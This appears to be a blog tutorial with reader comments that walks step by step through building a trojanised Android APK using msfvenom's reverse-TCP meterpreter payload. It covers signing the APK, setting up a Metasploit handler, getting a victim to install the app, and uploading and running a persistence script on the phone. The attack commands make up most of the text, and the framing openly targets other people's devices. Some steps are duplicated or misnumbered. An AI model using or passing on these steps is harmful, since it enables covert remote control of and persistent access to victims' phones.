1. Open a terminal.
2. You can do this by typing:
msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP>
LPORT=<Port to Listen>
R > /root/Desktop/<anything>.apk (replace LHOST with your own IP)
3. Now we
must generate a keystore and sign our apk because if we dont on some devices or
some versions of android signature of app is required.
4. For Generating the Keystore:
keytool -genkey -v -keystore /root/Desktop/my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
5. Enter a Six Digit Password and keep it remember.
6. Fill all the details and say
Yes at last question asked. Keystore will be created. You will be again asked for
the password.
7. Now we have to sign the apk file using this Keystore. To do this type:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore
my-release-key.keystore2 my_application.apk alias_name
When it ask for the Passphrase, Enter the password you entered
earlier.
8. Load metasploit console, by typing:
msfconsole
9. After it loads (it will take time), load the multi-handler exploit by
typing :
use exploit/multi/handler
10. Set up a
(reverse) payload by typing:
set payload android/meterpreter/reverse_tcp
11. To set L host type :
set LHOST <Your IP>
Note: Even if you are hacking on WAN type your private/internal IP here not
the public/external
the public/external
13. Copy the application that you made (Anything.apk) from the
root folder,
to your android phone.
to your android phone.
14. Then send the apk file to the phone you want to hack.
15. Let the Victim install the app.
Note: However, the option of allowance for Installation of
apps from Unknown Sources should be enabled (if not)
from the security settings of the android phone to allow the Trojan to install.
16. And when he clicks Open, there comes the meterpreter prompt.
17. Download Persistent.sh
18. Upload the file to
the device in /sdcard/Downloads.
19. cd / (To go to the Root Directory)
19. Then navigate to
the /sdcard/Download/ using cd
20. To upload the file use command:
upload /root/Desktop/Persistent.sh
(For these Images anything.sh is actually Persistent.sh)
21. Now, all we must
do is execute the script once, and then everything will be done by the script
automatically.
22. Drop into
the system's shell by typing:
shell
23. Now,
navigate to the location of the script:
cd /
cd
/sdcard/Download
ls
24. Now its time
for EXECUTION. Type:
sh Persistent.sh
Things To Remember:
The persistence of the backdoor will only remain until a reboot of the
android system.
If you are hacking on WAN and you have a dynamic Public IP, then, the
persistence will only remain until your router reboots/your IP changes.
Remember
to reboot the android to eliminate the running script, if you are testing on
you own Android System.
If the Victim's Android system is Rooted and your Public IP is Static,
then:
1)The Persistence will remain forever on WAN!
2)The Persistence will remain forever on LAN Obviously.
Video Tutorial:
Video Tutorial:
Can this only be used for linux? Kali sounds very useful and easy to use but I don’t have a linux device. Thanks for posting about it though.
ReplyDeleteI read this article. I think You put a lot of effort to create this article. I appreciate your work.
ReplyDeletethesis Writing Service